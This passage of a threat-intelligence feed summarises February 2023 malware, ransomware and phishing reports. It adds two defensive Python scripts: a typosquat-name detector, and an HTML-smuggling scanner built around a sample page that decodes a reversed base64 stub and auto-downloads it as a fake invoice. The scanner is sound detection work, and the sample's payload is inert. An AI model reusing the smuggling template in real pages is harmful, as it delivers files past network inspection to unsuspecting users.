- Researchers from Minerva Labs have identified a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.
Source:
https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/
—
- Intel Source:
- Cyble
- Intel Name:
- Turkish_Earthquake_Leads_to_Fake_Donation_Schemes
- Date of Scan:
- 2023-02-15
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have discovered various domains and IP addresses hosting websites that claim to be collecting funds to aid those affected by the earthquake in Turkey and Syria.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Tofsee_Malware
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Tofsee Malware. It has been around since 2016. Once installed on a compromised computer, it can be used to send spam emails and gather user data.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alerts-tofsee-malware-active-iocs
—
- Intel Source:
- ASEC
- Intel Name:
- Pybot_DDoS_Distributing_With_Illegal_Software
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- ASEC researchers have been monitoring malware distributed through illegal software such as cracks and serial keygens, and recently discovered the Pybot DDoS malware being distributed this way.
—
- Intel Source:
- BitDefender
- Intel Name:
- A_Deep_Investigation_of_VMware_ESXi_Servers_Vulnerability
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- BitDefender researchers have investigated the VMware ESXi servers vulnerability which was targeted by Opportunistic Threat Actors and advised users to patch it immediately.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Malware_Distributing_via_OneNote
- Date of Scan:
- 2023-02-15
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that Qakbot stopped using MS Office macros, its past distribution method, and instead started using OneNote files to execute its malware.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Targeting_Ukraine_Using_Remote_Utility_Program
- Date of Scan:
- 2023-02-14
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified a cyber attack on organizations and institutions in Ukraine using the Remote Utilities program.
—
- Intel Source:
- Group-IB
- Intel Name:
- Hackers_From_ChinaTargeting_GroupIB_Cybersecurity_Firm
- Date of Scan:
- 2023-02-14
- Impact:
- MEDIUM
- Summary:
- Group-IB researchers have identified that an APT group known as Tonto Team has tried targeting the Singapore-based Group-IB cybersecurity firm for the second time.
—
- Intel Source:
- BitSight
- Intel Name:
- Diving_Deep_into_Mylobot
- Date of Scan:
- 2023-02-14
- Impact:
- LOW
- Summary:
- BitSight researchers have analyzed the Mylobot malware and focused on its main capability, which is transforming the infected system into a proxy.
Source:
https://www.bitsight.com/blog/mylobot-investigating-proxy-botnet
—
- Intel Source:
- ASEC
- Intel Name:
- AsyncRAT_Leveraging_Windows_Help_File
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that AsyncRAT is being distributed as a Windows help file (*.chm).
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Malicious_Npm_Package_Using_Typosquatting_to_Download_Malware
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- Reversing Labs researchers have observed a package called “aabquerys” on the open-source JavaScript npm repository that uses typosquatting techniques to enable the download of malicious components.
Source:
https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain
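Both the PyPI imposter libraries noted earlier (typosquats of requests, urllib3, aiohttp and friends) and the npm “aabquerys” package here depend on a name that a developer will mistype or misremember. The Python function below is an added illustration, not Reversing Labs' tooling: it normalises a package name the way PyPI does (case folding and collapsing of `-`, `_` and `.` separators, per PEP 503), strips decorative affixes such as python- or -js, and measures the optimal string alignment distance (single-character edits plus adjacent transpositions) to a list of well-known names, flagging anything one edit away or a known name dressed up with an affix. The list of known names is an assumed short allowlist; a real deployment would feed it from registry download statistics.

```python
import re

# Assumed short list of high-profile package names to protect; a real deployment
# would feed this from registry download statistics.
KNOWN_PACKAGES = ("requests", "urllib3", "aiohttp", "http", "urllib",
                  "lodash", "express", "react", "axios")

# Decorative affixes that squatters bolt onto a real name ('python-requests', 'lodash-js').
AFFIX_RE = re.compile(r"^(python-|py-|node-|js-)|(-python|-py|-js|-node|[23])$", re.IGNORECASE)


def pep503(name):
    """PEP 503 name normalisation: lower-case, collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name.strip().lower())


def osa_distance(a, b):
    """Optimal string alignment distance: insertions, deletions, substitutions and
    adjacent transpositions each cost 1 (the classic typo model)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent transposition
    return d[len(a)][len(b)]


def typosquat_candidates(name, known=KNOWN_PACKAGES, max_distance=1):
    """Return [(known_name, reason)] for known packages that `name` could be impersonating.
    An exact (normalised) match with a known name returns [] because that *is* the real package."""
    norm = pep503(name)
    known_norm = {pep503(k): k for k in known}
    if norm in known_norm:
        return []
    stripped = AFFIX_RE.sub("", norm)
    candidates = []
    for kn, original in known_norm.items():
        if stripped == kn:
            candidates.append((original, "known name with a decorative prefix/suffix"))
        else:
            distance = osa_distance(norm, kn)
            if distance <= max_distance:
                candidates.append((original, f"{distance} edit(s) away from the known name"))
    return candidates


if __name__ == "__main__":
    for candidate in ("urllib3", "urlib3", "reqeusts", "python-requests", "lodahs", "aabquerys"):
        print(candidate, "->", typosquat_candidates(candidate) or "no match")
```

Treat the output as a triage queue rather than a verdict: short names such as http sit one edit away from legitimate packages (httpx, for instance), so an allowlist of known-good neighbours is needed before blocking anything.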
—
- Intel Source:
- Fortinet
- Intel Name:
- Supply_Chain_Attack_by_New_Malicious_Python_Package
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- Fortinet researchers have identified five malicious packages on the Python Package Index (PyPI) that steal passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.
—
- Intel Source:
- Huntress
- Intel Name:
- The_Clop_Ransomware_Claims_to_Have_Breached_130_Organizations
- Date of Scan:
- 2023-02-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Huntress have identified that the Clop ransomware gang claims to be behind recent attacks that exploited a zero-day vulnerability in the GoAnywhere MFT secure file transfer tool, saying it stole data from over 130 organizations.
Source:
https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_From_Dalbit_Group_Targeting_Vulnerable_Korean_Company_Servers
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that the Chinese threat actor group named Dalbit (m00nlight) is targeting vulnerable Korean company servers. The group relies on publicly available tools throughout, from the web shell used in the early stages to the ransomware used at the end.
—
- Intel Source:
- ASEC
- Intel Name:
- Website_posing_as_Naver_login_page
- Date of Scan:
- 2023-02-13
- Impact:
- LOW
- Summary:
- ASEC researchers have observed a situation where a fake Kakao login page is used to steal the account credentials of certain individuals.
—
- Intel Source:
- CISA
- Intel Name:
- DPRK_Malicious_Cyber_Activities
- Date of Scan:
- 2023-02-12
- Impact:
- MEDIUM
- Summary:
- This cybersecurity advisory provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware activity, including the TTPs and IOCs DPRK cyber actors have used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Malicious_Google_Ads_Targeting_AWS_Login
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- SentinelOne researchers have identified a new phishing campaign targeting Amazon Web Services (AWS) logins that abuses Google Ads to sneak phishing sites into Google Search results and steal login credentials.
Source:
https://www.sentinelone.com/blog/cloud-credentials-phishing-malicious-google-ads-target-aws-logins/
—
- Intel Source:
- CISA
- Intel Name:
- Ransomware_Attac_on_Critical_Infrastructure_Funded_by_DPRK
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- CISA has identified the TTPs and IOCs DPRK cyber actors are using to gain access to and conduct ransomware attacks against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
—
- Intel Source:
- SpiderLabs Blog
- Intel Name:
- Hackers_Leveraging_HTML_Smuggling_to_Deliver_Malware
- Date of Scan:
- 2023-02-10
- Impact:
- LOW
- Summary:
- SpiderLabs researchers have analyzed some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.
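HTML smuggling works by shipping the payload inside the HTML itself, usually as a base64 string (often reversed or otherwise lightly obfuscated) that JavaScript decodes with atob(), wraps in a Blob and hands to the browser as a download, so no executable file crosses the network boundary where a gateway could inspect it. The Python scanner below is an added example and not SpiderLabs' tooling: it looks for the typical JavaScript indicators, extracts every long base64 literal from the page, tries to decode it both as written and reversed, and identifies the decoded bytes by magic number. The HTML and the zip-like payload are constructed inside the script.

```python
import base64
import binascii
import re

# JavaScript building blocks that almost every HTML smuggling page combines.
INDICATORS = {
    "atob":          re.compile(r"\batob\s*\("),
    "blob":          re.compile(r"\bnew\s+Blob\s*\("),
    "object_url":    re.compile(r"\bURL\.createObjectURL\s*\("),
    "ms_save":       re.compile(r"\bmsSaveOrOpenBlob\b"),
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*=\s*[\"']"),
    "auto_click":    re.compile(r"\.click\s*\(\s*\)"),
    "reverse_join":  re.compile(r"\.reverse\s*\(\s*\)\s*\.join\s*\("),
}
# A quoted run of at least 200 base64 characters; padding is allowed anywhere so that
# reversed strings, which start with '=', are still captured.
B64_LITERAL_RE = re.compile(r"[\"']([A-Za-z0-9+/=]{200,})[\"']")
MAGIC = {
    b"PK\x03\x04": "zip",
    b"MZ": "pe",
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0": "ole",
    b"Rar!\x1a\x07": "rar",
    b"\x7fELF": "elf",
}


def file_type(raw):
    """Identify a decoded payload by its leading magic bytes."""
    for magic, name in MAGIC.items():
        if raw.startswith(magic):
            return name
    return "unknown"


def embedded_payloads(html):
    """Decode every long base64 literal in the page, trying the string as written and
    then reversed (a common trick to defeat naive base64 scanners).
    Returns [(variant, type, size)]."""
    payloads = []
    for m in B64_LITERAL_RE.finditer(html):
        literal = m.group(1)
        for variant, data in (("plain", literal), ("reversed", literal[::-1])):
            try:
                raw = base64.b64decode(data, validate=True)
            except binascii.Error:
                continue
            payloads.append((variant, file_type(raw), len(raw)))
            break  # first variant that decodes cleanly wins
    return payloads


def analyze_html(html):
    """Return the indicators found, the decoded payloads, and an overall verdict."""
    indicators = sorted(name for name, pattern in INDICATORS.items() if pattern.search(html))
    payloads = embedded_payloads(html)
    # Verdict: a payload is embedded AND the page decodes it client-side AND turns it into a file.
    is_smuggling = bool(payloads) and "atob" in indicators and bool({"blob", "ms_save"} & set(indicators))
    return {"indicators": indicators, "payloads": payloads, "is_smuggling": is_smuggling}


# Constructed sample: a zip-like stub (correct magic, padded with zeros) stored reversed.
PAYLOAD = b"PK\x03\x04" + b"\x00" * 160
SMUGGLED = base64.b64encode(PAYLOAD).decode()

SAMPLE_HTML = f"""<html><body>
<p>Your document is ready.</p>
<script>
  var s = '{SMUGGLED[::-1]}';
  var b = atob(s.split('').reverse().join(''));
  var bytes = new Uint8Array(b.length);
  for (var i = 0; i < b.length; i++) bytes[i] = b.charCodeAt(i);
  var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
  var a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'Invoice_2023.zip';
  document.body.appendChild(a);
  a.click();
</script>
</body></html>"""

if __name__ == "__main__":
    print(analyze_html(SAMPLE_HTML))
```

The reversed-string attempt is there because a scanner that only decodes literals as written misses the most common obfuscation; XOR-encoded or chunked payloads need the decoding routine extended in the same place.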
—
- Intel Source:
- Sonatype
- Intel Name:
- Malicious_aptX_Python_Package_Drops_Meterpreter_Shell
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have identified malicious Python packages on the PyPI software registry that carry out a bunch of nefarious activities.
Source:
https://blog.sonatype.com/malicious-aptx-python-package-drops-meterpreter-shell-deletes-netstat
—
- Intel Source:
- ASEC
- Intel Name:
- The_distribution_of_Quasar_RAT
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- The ASEC analysis team discovered Quasar RAT malware being distributed through a private Home Trading System (HTS). It is assumed that the victims did not install their HTS from an institutional financial company but instead obtained the HPlus HTS from an unsanctioned source or a disguised financial investment company. Quasar is a RAT that allows threat actors to gain control over infected systems to steal information or perform other malicious actions.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Backdoor_with_Smart_Screenshot_Capability
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a backdoor that, like many backdoors and trojans, implements a screenshot capability to “see” what is displayed on the victim’s computer; this one takes its screenshots in Python.
—
- Intel Source:
- Cybereason
- Intel Name:
- GootLoader_Leveraging_SEO_Poisoning_Techniques
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- Cybereason researchers have investigated an incident that involved new deployment methods of the GootLoader malware loader through heavily-obfuscated JavaScript files.
—
- Intel Source:
- Blackberry
- Intel Name:
- Hackers_From_NewsPenguin_Targeting_Pakistani_Entities
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- BlackBerry researchers have identified that a previously unknown threat actor dubbed NewsPenguin is linked to a phishing campaign targeting Pakistani entities that leverages the upcoming international maritime expo as a lure.
—
- Intel Source:
- NTT Security
- Intel Name:
- The_malware_attacks_distributed_by_SteelClove_group
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- The NTT Security SOC team shared the latest tactics in attacks by SteelClover, among the most recently observed cases of malware distribution via Google Ads. SteelClover is a financially motivated attack group that has been active since 2019.
Source:
https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle
—
- Intel Source:
- SecuInfra
- Intel Name:
- Analysis_of_ESXiArgs_Ransomware
- Date of Scan:
- 2023-02-09
- Impact:
- LOW
- Summary:
- In their post, SecuInfra analysts analyze the recent “ESXiArgs” ransomware variant, which spread to a large number of outdated, internet-exposed ESXi servers around the world.
Source:
https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
—
- Intel Source:
- Symantec
- Intel Name:
- New_Russian_Information_Stealing_Malware_Graphiron
- Date of Scan:
- 2023-02-09
- Impact:
- MEDIUM
- Summary:
- The Russian Nodaria espionage group (aka UAC-0056) is using a new piece of information-stealing malware against targets in Ukraine. The malware (Infostealer.Graphiron) is written in Go and is designed to collect a wide range of information from the infected computer, including system information, credentials, screenshots, and files.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_30th_to_February_5th_2023
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor weekly malware collection samples; for January 30 to February 5, 2023, the top malware families were SmokeLoader, BeamWinHTTP, Formbook, Quasar RAT and Redline.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Cl0p_Ransomware_Targets_Linux_Systems
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have observed the first ELF variant of Cl0p (also known as Clop) ransomware targeting Linux systems. The new variant is similar to the Windows variant, using the same encryption method and similar process logic.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Newly_Threat_Actor_TA866_Distributing_Malware_via_Email
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- Researchers from Proofpoint have observed a cluster of evolving financially motivated activity which they are referring to as “Screentime”. The attack chain starts with an email containing a malicious attachment or URL and leads to malware that Proofpoint dubbed WasabiSeed and Screenshotter.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Zhulong_Threat_Group_Targeting_Vietnam_Telecom_and_Media_Sector
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have discovered a new hacking group that is targeting Vietnam’s telecom, technology, and media sectors. The group, dubbed Earth Zhulong, is linked to the China-linked hacking group 1937CN based on similar code in its custom shellcode loader and shared victimology.
Source:
https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-vietnam.html
—
- Intel Source:
- Cyble
- Intel Name:
- Ransomware_Attacks_Targeting_VMware_ESXi_Servers
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Cyble researchers have identified a ransomware attack targeting VMware ESXi servers to deploy ESXiArgs ransomware.
Source:
https://blog.cyble.com/2023/02/06/massive-ransomware-attack-targets-vmware-esxi-servers/
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber_Ransomware_Distributing_Again_in_Korea
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the redistribution of Magniber disguised as normal Windows Installers (MSI). The distributed Magniber files have MSI as their extensions, disguising themselves as Windows update files.
—
- Intel Source:
- Equinix Threat Analysis Center
- Intel Name:
- Royal_Ransomware_Targeting_VMware_ESXi_Servers_in_Linux_Devices
- Date of Scan:
- 2023-02-08
- Impact:
- LOW
- Summary:
- Researchers from the Equinix Threat Analysis Center (ETAC) have identified that Royal ransomware has updated its techniques for encrypting Linux devices, specifically targeting VMware ESXi virtual machines.
Source:
https://twitter.com/BushidoToken/status/1621087221905514496
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_Targeting_State_Bodies_of_Ukraine
- Date of Scan:
- 2023-02-08
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified the mass distribution of e-mails carrying an attachment in the form of a RAR archive named “court letter, information on debt.rar”.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Trigona_ransomware_variant
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs compiled a report on the Trigona ransomware with details and insights into this part of the ransomware landscape and protection against these variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Observed_intrusion_used_AutoHotkey_to_launch_a_keylogger
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- The DFIR Report team observed a compromise that began with a Word document containing a malicious VBA macro, which established persistence and communication with a command and control (C2) server. During the initial discovery and user enumeration, the threat actor used AutoHotkey to launch a keylogger.
Source:
https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Medusa_Botnet_targeting_Linux_Users
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs has been monitoring the actions and behavior of MiraiBot, a botnet capable of performing DDoS, ransomware, and brute-force attacks.
Source:
https://blog.cyble.com/2023/02/03/new-medusa-botnet-emerging-via-mirai-botnet-targeting-linux-users/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Trickbot_Malware
- Date of Scan:
- 2023-02-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Trickbot malware. It has been operating since 2016. It is primarily distributed through phishing campaigns and is known for its ability to steal sensitive information such as login credentials, financial information, and personal data.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-trickbot-malware-active-iocs-30
—
- Intel Source:
- ASEC
- Intel Name:
- The_cases_of_threat_actors_using_Sliver_malware
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- This ASEC blog describes recent cases of threat actors using Sliver in addition to Cobalt Strike and Metasploit. The ASEC (AhnLab Security Emergency response Center) analysis team keeps an eye on attacks against systems with either unpatched vulnerabilities or misconfigured settings. They recently discovered a Sliver backdoor being installed through what is presumed to be the exploitation of a vulnerability in certain software.
—
- Intel Source:
- ASEC
- Intel Name:
- Hackers_backdoor_Windows_Devices_in_Sliver_and_BYOVD_Attacks
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- ASEC researchers have identified a new hacking campaign that exploits Sunlogin flaws to deploy the Sliver post-exploitation toolkit and launch Windows Bring Your Own Vulnerable Driver (BYOVD) attacks to disable security software.
—
- Intel Source:
- Zscaler
- Intel Name:
- Analysis_of_the_AveMaria_infostealer_attack_chain
- Date of Scan:
- 2023-02-07
- Impact:
- LOW
- Summary:
- Zscaler’s ThreatLabz research team closely monitors and tracks active threat campaigns. Their report provides seven case studies that give an in-depth analysis of the AveMaria infostealer attack chain and how it has shifted over the past six months.
—
- Intel Source:
- Security Joes
- Intel Name:
- The_Gambling_Industry_is_targeted_by_Ice_Breaker_Operation
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- In September of last year, Security Joes IRT was informed about an incident involving an attempt to socially engineer an online customer service platform. Due to custom-built rules and extensive employee awareness training, Security Joes IRT was able to push back these threats. They have since tracked a new threat actor, named Ice Breaker APT. Although research is still ongoing, the team is sharing this article to reveal the attacker’s modus operandi, attack chain, ways to mitigate the threat, and supporting IOCs, TTPs and YARA rules.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_23_29th_2023
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor weekly malware collection samples; for January 23-29, 2023, the top malware families were SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and SnakeKeylogger.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Hackers_Leveraging_Microsoft_Visual_Studio_Add_Ins_to_Push_Malware
- Date of Scan:
- 2023-02-06
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have observed that threat actors are increasingly using Microsoft Visual Studio Tools for Office (VSTO) as a method to achieve persistence and execute code on a target machine via malicious Office add-ins.
Source:
https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors
—
- Intel Source:
- Fortinet
- Intel Name:
- Supply_Chain_Attack_by_New_Malicious_Python_Package_web3_essential
- Date of Scan:
- 2023-02-06
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have discovered another new zero-day attack in a PyPI (Python Package Index) package called web3-essential. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as part of its installation.
—
- Intel Source:
- Quickheal
- Intel Name:
- The_Details_Examination_of_Malware_Technique
- Date of Scan:
- 2023-02-05
- Impact:
- LOW
- Summary:
- QuickHeal researchers have examined crucial steps in the attack chain, such as how the malware achieves administrative privileges in order to make changes to the system.
—
- Intel Source:
- Cyble
- Intel Name:
- New_BATLoader_Spreading_RATs_and_Stealers
- Date of Scan:
- 2023-02-05
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a novel type of BAT loader being used to distribute a range of RAT and stealer malware families. This loader employs an innovative method to deliver the malicious payload to the user's system.
Source:
https://blog.cyble.com/2023/02/02/new-batloader-disseminates-rats-and-stealers/
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Mustang_Panda_APT_Group_Targeting_Europe_With_Spearphishing_Campaign
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- EclecticIQ researchers have identified that the Mustang Panda APT group started targeting Europe with a new spearphishing campaign using a customized variant of the PlugX backdoor.
—
- Intel Source:
- Cyble
- Intel Name:
- Qakbot_Rising_with_New_Strategies
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- Cyble researchers have identified that threat actors are leveraging Microsoft OneNote to infect users.
Source:
https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/
—
- Intel Source:
- Sentinelone
- Intel Name:
- DotNET_Malware_Loaders_aka_MalVirt_Distributing_Through_Malvertising_Attack
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed a cluster of virtualized .NET malware loaders distributed through malvertising attacks. The loaders, dubbed MalVirt, use obfuscated virtualization for anti-analysis and evasion, along with the Windows Process Explorer driver for terminating processes.
Source:
https://www.sentinelone.com/labs/malvirt-net-virtualization-thrives-in-malvertising-attacks/
—
- Intel Source:
- WithSecure
- Intel Name:
- Hackers_From_Korea_Exploiting_Unpatched_Zimbra_Devices
- Date of Scan:
- 2023-02-04
- Impact:
- LOW
- Summary:
- Researchers from WithSecure have identified a new intelligence-gathering campaign, linked to the prolific North Korean state-sponsored Lazarus Group, that leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_LNK_File_Disguising_as_a_Normal_HWP_Document
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of a malicious LNK file disguised as a normal HWP document, along with a text file impersonating the National Tax Service.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_From_APT34_Targeting_The_Middle_East
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified a suspicious executable that was dropped and executed on multiple machines. Upon investigation, it was linked to APT34, and its main goal is to steal users’ credentials. Even in the case of a password reset or change, the malware is capable of sending the new credentials to the threat actors.
Source:
https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html
—
- Intel Source:
- Aqua Blog
- Intel Name:
- HeadCrab_Malware_Compromising_Redis_Servers
- Date of Scan:
- 2023-02-03
- Impact:
- LOW
- Summary:
- Aqua security researchers have identified that around 1,200 Redis database servers worldwide have been corralled into a botnet using an elusive and severe threat dubbed HeadCrab since early September 2021.
Source:
https://blog.aquasec.com/headcrab-attacks-servers-worldwide-with-novel-state-of-art-redis-malware
—
- Intel Source:
- ASEC
- Intel Name:
- CoinMiners_Mining_Ethereum_Classic_Coins_attack_cases
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team is observing CoinMiners that target Korean and overseas users. The team has studied various types of CoinMiner attacks across multiple blog posts in the past, and has now shared information on recently discovered malware that mines Ethereum Classic coins.
—
- Intel Source:
- CERT-UA
- Intel Name:
- The_Ministry_of_Foreign_Affairs_official_of_Ukraine_Web_Resource_Imitated
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered a web page imitating the official web resource of the Ministry of Foreign Affairs of Ukraine, which offers to download software for the detection of infected computers.
—
- Intel Source:
- Cyble
- Intel Name:
- Remote_Desktop_Files_targeted_by_evasive_malware
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) discovered a new malware named ‘Vector Stealer’, which can steal .rdp files. Stealing these RDP files can enable threat actors to perform RDP hijacking, as the files contain details about the RDP session, including information needed for remote access.
Source:
https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/
—
- Intel Source:
- Checkmarx
- Intel Name:
- The_track_of_tactics_of_the_threat_actor_PYTA27
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- In this blog, Checkmarx threat researchers analyzed the tactics of one attacker who has been distributing their packages for at least four months and shows no signs of stopping. This actor is tracked as PYTA27.
Source:
https://checkmarx.com/blog/evolution-of-a-software-supply-chain-attacker/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_spread_of_Redline_Infostealer_Malware
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Recently, Rapid7 discovered malicious actors using OneNote files to deliver malicious code. Rapid7 found a specific technique that used OneNote files containing batch scripts, which upon execution started an instance of a renamed PowerShell process to decrypt and execute a base64-encoded binary.
—
- Intel Source:
- PRODAFT
- Intel Name:
- Active_IOCs_of_LockBit_Green
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Prodaft have identified that the LockBit ransomware team made a so-called “LockBit Green” version of their ransomware available.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Microsoft_OneNote_Documents_Delivering_Malware_via_Email
- Date of Scan:
- 2023-02-02
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers have identified an increase in threat actor use of OneNote documents to deliver malware via email to unsuspecting end-users in December 2022 and January 2023.
—
- Intel Source:
- PaloAlto
- Intel Name:
- GuLoader_Encrypted_With_NSIS_Crypter
- Date of Scan:
- 2023-02-02
- Impact:
- LOW
- Summary:
- In their post, the Unit 42 researchers discussed a machine learning pipeline and their analysis of one GuLoader downloader that had been encrypted with a Nullsoft Scriptable Install System (NSIS) crypter. NSIS is an open source system for creating Windows installers.
Source:
https://unit42.paloaltonetworks.com/malware-detection-accuracy/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Analysis_of_Cryptojacks_System_to_Mine_for_Monero_Crypto
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Fortinet researchers have analyzed crypto miner software that is delivered via an Excel document and executed on the victim's device.
—
- Intel Source:
- ASEC
- Intel Name:
- An_Email_Specific_Phishing_Page
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ASEC researchers have identified multiple phishing emails that change their icon to reflect the mail service of the account entered by the user and warn that the account will be shut down, prompting the user to click the ‘Reactivate Now’ link if they want to keep their account active.
—
- Intel Source:
- Secureworks
- Intel Name:
- The_Similarities_Between_Abraham_s_Ax_and_Moses_Staff_Group
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
